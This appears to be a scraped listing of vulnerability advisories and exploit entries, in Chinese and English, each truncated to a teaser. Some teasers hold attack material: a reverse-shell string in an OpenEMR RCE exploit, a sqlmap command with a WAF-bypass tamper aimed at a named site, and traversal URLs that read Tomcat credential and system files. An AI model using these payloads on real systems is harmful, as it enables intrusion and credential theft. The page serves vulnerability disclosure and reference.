Jcow 4.2.1 LFI Vulnerability

No description provided by source. ------------------------------------------------------------------------ Software................Jcow 4.2.1 Vulnerability...........Local File Inclusion Threat Level............Critical 4/5 Download................http://www.jcow.net/ Discovery...

用友致远A6协同管理系统多处敏感信息泄露

用友致远A6协同管理系统：面向广大的企事业组织应用设计，是一个基于互联网的高效协同工作平台和优秀的协同管理系统。它融入先进的协同管理理念，运用领先的网络技术，切实有效的解决企事业组织工作管理中的关键应用。利用它可把日常管理中的业务、事务、事件等信息在单位、部门、组群、个人之间进行及时高效、有序可控、全程共享的沟通和处理。是一套非常适合国情的、并具有很高性价比的软件。 漏洞描述： 用友致远A6协同管理系统多处敏感信息泄露漏洞 漏洞分析： 用友致远A6协同管理系统对敏感文件的访问权限设置不当，导致多处敏感信息泄漏。 /yyoa/assess/js/initDataAssess.jsp...

OpenSSL SSL/TLS MITM Vulnerability (CVE-2014-0224)

OpenSSL is an open-source SSL implementation, used to implement the network communication of high-strength encryption, it is now widely used in various network applications. OpenSSL 0.9.8 za, 1.0.0 m, 1.0.1 h prior version, does not properly handle ChangeCipherSpec messages, which allows the midd...

cgcraft llc (info.php?id) (news_item.php?id) Remote SQL injection

No description provided by source. IRANIAN THE BEST HACKERS IN THE WORLD \ Remote SQL injection Vulnerability cgcraft llc info.php?id newsitem.php?id AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.cgcraft.com/ Persian Gulf 4 Ever! Dork :...

OpenSSH 'child_set_env()'函数安全绕过漏洞

Bugtraq ID:66355 CVE ID:CVE-2014-2532 OpenSSH是一种开放源码的SSH协议的实现。 OpenSSH "childsetenv"函数usr.bin/ssh/session.c存在错误，允许恶意本地用户在通配符之前使用子串来绕过环境限制。 0 OpenSSH 6.x OpenSSH 6.6已经修复该漏洞，建议用户下载更新： http://www.openssh.com...

WebLogic 任意文件上传漏洞(CVE-2018-2894)

漏洞影响版本：10.3.6.0, 12.1.3.0, 12.2.1.2, 12.2.1.3 下载地址：http://download.oracle.com/otn/nt/middleware/12c/12213/fmw12.2.1.3.0wlsquickDisk11of1.zip 漏洞复现 服务启动后，访问 http://localhost:7001/wsutc/config.do 可以将当前的工作目录为更改为其他目录。以本地环境为例，可以部署到...

用友ERP-NC任意文件遍历漏洞

No description provided by source...

Linux Kernel 2.6 < 2.6.19 - (32bit) ip_append_data() ring0 Root Exploit

No description provided by source. / 0x82-CVE-2009-2698 Linux kernel 2.6 2.6.19 32bit ipappenddata local ring0 root exploit Tested White Box 42.6.9-5.ELsmp, CentOS 4.42.6.9-42.ELsmp, CentOS 4.52.6.9-55.ELsmp, Fedora Core 42.6.11-1.1369FC4smp, Fedora Core 52.6.15-1.2054FC5, Fedora Core...

MetInfo 6.0.0存在任意文件写入漏洞getshell

...

Tableau Server SQL注入漏洞

CVECAN ID:CVE-2014-1204 Tableau Server是美国Tableau软件公司的一套桌面系统商业智能应用程序，它提供了一种基于浏览器的分析工具，能够将Tableau Desktop中交互式数据可视化内容、仪表盘、报告与工作簿的共享变得迅速简便。 Tableau Server 8.0.7之前的8.0.x版本和8.1.2之前的8.1.x版本中存在SQL注入漏洞。远程攻击者可利用该漏洞执行任意SQL命令。 0 Tableau Server 8.0.x 8.0.7 Tableau Server 8.1.x 8.1.2 厂商补丁： Tableau Server -----...

mcms最新版任意表的任意字段SQL注入漏洞

简要描述： mcms最新版任意表的任意字段SQL注入漏洞 详细说明： 前两天在wooyun提了两个漏洞，一天就确认修复了，而且出了新版本，那我就去官网下个最新（v3.1.1.enterprise）的来学习学习。 注入一枚：GET /app/user/info.php?m=changemodel&ajax=1&infoid=1&modelname=product GET中有个参数modelname，这个参数是用来与数据表前缀（TBPRE）拼接需要操作的数据表的表名的，在获得modelname时并没有过滤，因此，在数据表名可就可以进行注入了，当然，可以利用任意表的任意字段来进行注入。...

HiSilicon Multiple Vulnerabilities

HiSilicon DVR hack This report discloses serious vulnerabilities with proof of concept PoC code of DVR/NVR devices built using the HiSilicon hi3520d and similar system on a chip SoC. Exploiting the vulnerabilities lead to unauthorized remote code execution RCE using only the web interface, causin...

Zenphoto <= 1.4.1.4 (ajax_create_folder.php) Remote Code Execution

No description provided by source. ?php / -------------------------------------------------------------------------- Zenphoto = 1.4.1.4 ajaxcreatefolder.php Remote Code Execution Exploit -------------------------------------------------------------------------- author............: Egidio Romano a...

WordPress Revslider 插件任意文件上传漏洞与任意文件下载漏洞 (SoakSoak)

漏洞描述 据报道，此次SoakSoak恶意软件在大量WordPress站点中的爆发源于一款名为Revslider的幻灯片插件，该插件曾被爆多个安全漏洞，涉及任意文件下载、任意文件上传等。Revslider由ThemePunch出品，属于一款商业性插件（收费），因其具有强大的功能和良好的易用性而有着不错的销量，并且在ThemePunch出品的一些WordPress主题中也自带有该款插件。...

seacms 后台sql注入漏洞

...

UDP Technology IP 摄像头认证绕过 RCE 漏洞（CVE-2021-33543、CVE-2021-33544）

...

正方教务管理系统 file.asmx等多个Websevice接口 SQL注入漏洞

No description provided by source...

kingdee EAS系统 V7.5 /plt_iservice/service/findFavList.action 远程命令执行漏洞

0x01 框架介绍 全球第一款融合TOGAF标准SOA架构的企业管理软件，金蝶EAS面向亟待跨越 成长鸿沟的大中型企业，以"创造无边界信息流"为产品设计理念， 支持云计算、SOA 和动态流程管理的整合技术平台，全面覆盖企业战略管理、风险管理、集团财务管 理、战略人力资源管理、跨组织供应链、多工厂制造和外部产业链等管理领域，突破 流程制造、项目制造、供应商协作、客户协作等复杂制造和产业链协同应用，实现业 务的全面管理，支持管理创新与发展，帮助企业敏捷应对日益复杂的商业环境变化， 提升整体运作效率，实现效益最大化。 官方主页：www.kingdee.com 0x02 漏洞细节...

RaidenFTPD 'MLST'命令远程拒绝服务漏洞

BUGTRAQ ID: 31741 CNCAN ID：CNCAN-2008101407 RaidenFTPD是一款FTP服务程序。 RaidenFTPD处理'MLST'命令存在问题，远程攻击者可以利用漏洞对应用程序进行拒绝服务攻击。 提交特殊构建的'MLST'命令，可导致应用程序崩溃。 Raiden Professional Servers RaidenFTPD 2.4 3620 Raiden Professional Servers RaidenFTPD 2.4 .2241 Raiden Professional Servers RaidenFTPD 2.4 .2240...

MiGCMS 2.0.5 Multiple Remote File Inclusion Vulnerabilities

No description provided by source. ┌┌───────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rise...

WebLogic 反序列化远程命令执行漏洞(CVE-2018-2893)

...

pligg <= 9.9.0 (xss/lfi/sql) Multiple Vulnerabilities

No description provided by source. GulfTech Security Research July 30, 2008 Vendor : Pligg LLC URL : http://www.pligg.com/ Version : Pligg = 9.9 Risk : Multiple Vulnerabilities Description: Pligg is a popular open source, full featured, content management system written in php. There are a number...

OpenEMR < 5.0.1 - Remote Code Execution

Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example: http://127.0.0.1/openemr." ap.addargument"-u", "--user",...

Synology DSM目录遍历漏洞

CVE ID:CVE-2013-6987 Synology DiskStation Manager 是第一个提供网络多任务处理用户接口的NAS操作系统。 Synology DSM目录遍历漏洞漏洞允许任何身份验证的用户访问，创建，删除，修改系统文件和配置文件。 0 Synology DSM = 4.3-3810 Synology ----- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http:// www.synology.com Following some examples "test" is a valid folder name: - Delete...

Microsoft Edge Scripting Engine Memory Corruption Vulnerability (CVE-2017-0234)

A remote code execution vulnerability exists in the way that the Chakra JavaScript engine renders when handling objects in memory in Microsoft Edge. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. In a web-base...

Microsoft Windows内核双重释放本地权限提升漏洞（MS10-015）

BUGTRAQ ID: 38044 CVECAN ID: CVE-2010-0233 Microsoft Windows是微软发布的非常流行的操作系统。 当释放内存时，Windows内核没有正确地重置指针，导致内核中出现双重释放的情况。成功利用此漏洞的攻击者可以运行任意内核态代码。攻击者可随后安装程序；查看、更改或删除数据；或者创建拥有完全用户权限的新帐户。 Microsoft Windows XP SP3 Microsoft Windows XP SP2 Microsoft Windows Vista SP2 Microsoft Windows Vista SP1 Microsoft...

WarpSpeed 4nAlbum Module 0.92 displaycategory.php basepath Parameter Remote File Inclusion

No description provided by source. source: http://www.securityfocus.com/bid/9881/info It has been reported that 4nAlbum is prone to multiple vulnerabilities. These issues are primarily due to a failure of the module to validate user input. There is an information disclosure issue with the...

Linux Kernel llc_ui_getname函数本地信息泄露漏洞

BUGTRAQ ID: 36126 CVECAN ID: CVE-2009-3001 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel的net/llc/afllc.c文件中的llcuigetname函数没有正确地初始化某些数据结构，这允许本地用户通过对AFLLC套接字调用getsockname读取部分内核内存的内容。 Linux kernel 2.6.31-rc7 厂商补丁： Linux ----- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：...

Apache 2.4.2 HTTP Server HTML注入和信息泄露漏洞

BUGTRAQ ID: 55131 CVE ID: CVE-2012-2687,CVE-2012-3502 Apache HTTP Server（简称Apache）是Apache软件基金会的一个开放源码的网页服务器，可以在大多数计算机操作系统中运行，由于其多平台和安全性被广泛使用，是最流行的Web服务器端软件之一。 Apache HTTP Server在实现上存在HTML注入漏洞和信息泄露漏洞，攻击者可利用这些漏洞获取敏感信息，在受影响站点浏览器中执行任意脚本代码，窃取cookie身份验证凭证或控制站点外观。 0 Apache 2.4.2 厂商补丁： Apache Group...

PostgreSQL 8.x/9.x 存在多个安全漏洞

CVE-2012-0866 CVE-2012-0867 CVE-2012-0868 PostgreSQL是一款对象关系型数据库管理系统，支持扩展的SQL标准子集 PostgreSQL存在多个安全漏洞，允许恶意用户绕过部分安全限制，进行伪造攻击或操作某些数据 -在触发函数上没有对CREATE TRIGGER进行正确的权限检查，可利用此漏洞标记触发函数为SECURITY DEFINER，可授权EXECUTE权限 -在校验SSL证书的公用名时不正确把名称截断为32个字符，可导致不正确校验伪造证书...

Linux Kernel gfs_lock函数本地拒绝服务漏洞

CVECAN ID: CVE-2010-0727 Linux Kernel是开放源码操作系统Linux所使用的内核。 Linux Kernel的gfs2lock和gfslock函数没有正确地删除对setgid未设置group-execute权限文件的POSIX锁定，这允许本地用户通过在GFS或GFS2文件系统上锁定文件然后再更改该文件的权限导致系统崩溃。 Linux kernel 2.6.x 厂商补丁： Linux ----- 目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载： http://lkml.org/lkml/2010/3/11/269...

Samsung SmartThings Hub video-core RTSP Configuration Command Injection Vulnerability(CVE-2018-3856)

Summary An exploitable vulnerability exists in the smart cameras RTSP configuration of the Samsung SmartThings Hub. The device incorrectly handles spaces in the URL field, leading to an arbitrary operating system command injection. An attacker can send a series of HTTP requests to trigger this...

JEECMS后台任意文件编辑漏洞and官方漏洞及拿shell

简要描述： JEECMS后台任意文件编辑漏洞以及官方的demo站、官方服务器安全问题 详细说明： 2.x后台： login/Jeecms.do 3.x后台： jeeadmin/jeecms/index.do 默认账户：admin 默认密码：password 获取tomcat密码： /jeeadmin/jeecms/template/vedit.do?root=../../conf/&name=../../conf/tomcat-users.xml 获取JDBC数据库账号密码：...

Samsung SmartThings Hub video-core samsungWifiScan Callback Code Execution Vulnerability(CVE-2018-3867)

Summary An exploitable stack-based buffer overflow vulnerability exists in the samsungWifiScan callback notification of video-core's HTTP server of Samsung SmartThings Hub. The video-core process incorrectly handles the answer received from a smart camera, leading to a buffer overflow on the stac...

Apache AXIS Non-Existent WSDL路径信息泄露漏洞

Apache AXIS是一款Apache WebService项目中的子项目，构造基于SOAP应用的解决方案。 Apache AXIS存在信息泄露问题，远程攻击者可以利用漏洞获得WEB服务目录路径信息。 当远程攻击者请求不存在的WSDLWeb服务定义语言文件时，可导致java.io.FileNotFoundException功能中出现错误，而返回软件的物理路径给攻击者，利用这些信息攻击者可对系统进行进一步攻击。 Apache AXIS 1.0 目前没有解决方案提供： http://ws.apache.org/axis/...

Jenkins 配置文件路径改动导致管理员权限开放漏洞(CVE-2018-1999001)

CVE-2018-1999001 为配置文件路径改动漏洞。远程且未经授权的攻击者可以通过构造恶意登录凭证，从 Jenkins 主目录下移除 config.xml 配置文件到其他目录，从而导致 Jenkins 服务下次重启时退回 legacy 模式，对匿名用户也会开放管理员权限，如下图所示： CVE-2018-1999001 漏洞利用的条件是需要等待 Jenkins 服务的重启。...

Samsung SmartThings Hub video-core Camera URL Replace Code Execution Vulnerability(CVE-2018-3902)

Summary An exploitable buffer overflow vulnerability exists in the camera "replace" feature of video-core's HTTP server of Samsung SmartThings Hub. The video-core process incorrectly extracts the URL field from a user-controlled JSON payload, leading to a buffer overflow on the stack. An attacker...

Dolphin 7.0.3 - Multiple Vulnerabilities

No description provided by source. Exploit Title: Dolphin Mullti Vulnerability Date : 29-10-2010 Author : anT!-Tr0J4n Version : 7.0.3 DorK : Powered by Dolphin Greetz : Dev-PoinT.com inj3ct0r.com All Dev-poinT members and my friends Home : www.Dev-PoinT.com : http://inj3ct0r.com Email :...

Apache HTTP Server balancer_handler函数跨站脚本漏洞(CVE-2012-4558)

BUGTRAQ ID: 58165 CVECAN ID: CVE-2012-4558 Apache HTTP Server是开源HTTP服务器。 Apache HTTP Server被报告存在多个漏洞，攻击者能利用这些漏洞进行跨站脚本攻击。 1）modinfo, modldap, modstatus, modimagemap, 以及modproxyftp模块中某些与hostnames和URI相关的输入没有经过正确的检查即返回给用户。 2）传递给modproxybalancer模块管理接口的某些不确定输入没有经过正确检查即返回给用户。...

SiteOmat Station Automation Software Multiple Vulnerabilities

A few months ago, while undertaking unrelated research into online connected devices, we uncovered something surprising and realized almost immediately that we could be looking at a critical security threat. What we found was a simple purple web interface that was in fact a link to a real-life ga...

DedeCMS后台地址爆破漏洞

...

青果教务系统存在SQL注入漏洞（简单绕过WAF保护）

简要描述： 青果教务系统存在SQL注入漏洞（简单绕过WAF保护） 详细说明： 案例：http://www.kingosoft.com/cgal/mxyh.aspx 存在漏洞的文件：/xsweb/pub/temp.aspx?type=ajax&fellowXh=wooyun 同样，该系统有waf的防御，只需要使用--tamper参数即可绕过，继续注入 sqlmap.py -u "http://stu.gxufe.cn/xsweb/pub/temp.aspx?type=menu&nj=wooyun" --tamper "equaltolike.py" --dbms mssql sqlmap....

Samsung SmartThings Hub video-core clips Code Execution Vulnerability(CVE-2018-3893 - CVE-2018-3897)

Summary Multiple exploitable buffer overflow vulnerabilities exist in the /cameras/XXXX/clips handler of video-core's HTTP server of Samsung SmartThings Hub. The video-core process incorrectly extracts fields from a user-controlled JSON payload, leading to a buffer overflow on the stack. An...

Samsung SmartThings Hub video-core Database find-by-cameraId Code Execution Vulnerability(CVE-2018-3880)

Summary Multiple exploitable vulnerabilities exist in the REST parser of video-core's HTTP server of the Samsung SmartThings Hub. The video-core process incorrectly handles pipelined HTTP requests, which allows successive requests to overwrite the previously parsed HTTP method, URL and body. An...

Nginx privilege elevation vulnerability (Debian, Ubuntu distributions)

Discovered by: Dawid Golunski - dawidatlegalhackers.com - https://legalhackers.com - Release date: 15.11.2016 - Revision 1.0 I. VULNERABILITY ------------------------- Nginx Debian-based distros - Root Privilege Escalation Fixed in 1.6.2-5+deb8u3 package on Debian, and 1.10.0-0ubuntu0.16.04.3 on...

ClipShare < 3.0.1 (tid) Remote SQL Injection Vulnerability

No description provided by source. // / / / Clipshare / / / / Remote SQL Injection Vulnerability / / / / / // AUTHOR : SuNHouSe2 ALGERIAN HaCkEr DORK : powered by clipshare VERSION : less than v3.0.1 EXPLOIT :...

Microsoft wimgapi LoadIntegrityInfo Code Execution Vulnerability(CVE-2018-8210)

Summary An exploitable heap corruption exists in the LoadIntegrityInfo function of wimgapi version 10.0.16299.15 WinBuild.160101.0800. A crafted WIM image can lead to a heap corruption, resulting in direct code execution. Tested Versions WIMGAPI 10.0.16299.15 WinBuild.160101.0800 Product URLs...

华天动力OA任意文件下载漏洞（两处）

简要描述： 华天动力OA任意文件下载（两处） 详细说明： 通用漏洞， 以http://demo.oa8000.com为例。 1.首先必须先访问http://demo.oa8000.com 2. 第一处 访问 http://demo.oa8000.com/OAapp/jsp/download.jsp?filename=boot.ini&filePath=C%3A%2Fboot.ini&noDecode=1 即可下载C:\boot.ini filename为目标文件名，filePath为目标文件绝对地址 第二处 这次是downloadClient.jsp...

Microsoft Windows DNS服务器RPC接口远程栈溢出漏洞

Microsoft Windows是微软发布的非常流行的操作系统。 Microsoft Windows DNS服务器的RPC接口在处理畸形请求时存在栈溢出漏洞，远程攻击者可能利用此漏洞获取服务器的管理权限。 如果远程攻击者能够向有漏洞的系统发送特制的RPC报文的话，就可以触发这个溢出，导致以DNS服务的安全环境执行任意指令（默认为Local SYSTEM）。 Microsoft Windows Server 2003 SP2 Microsoft Windows Server 2003 SP1 Microsoft Windows 2000SP4 临时解决方法：...

Samsung SmartThings Hub video-core AWSELB Cookie Code Execution Vulnerability(CVE-2018-3925)

Summary An exploitable buffer overflow vulnerability exists in the remote video-host communication of video-core's HTTP server of Samsung SmartThings Hub. The video-core process insecurely parses the AWSELB cookie while communicating with remote video-host servers, leading to a buffer overflow on...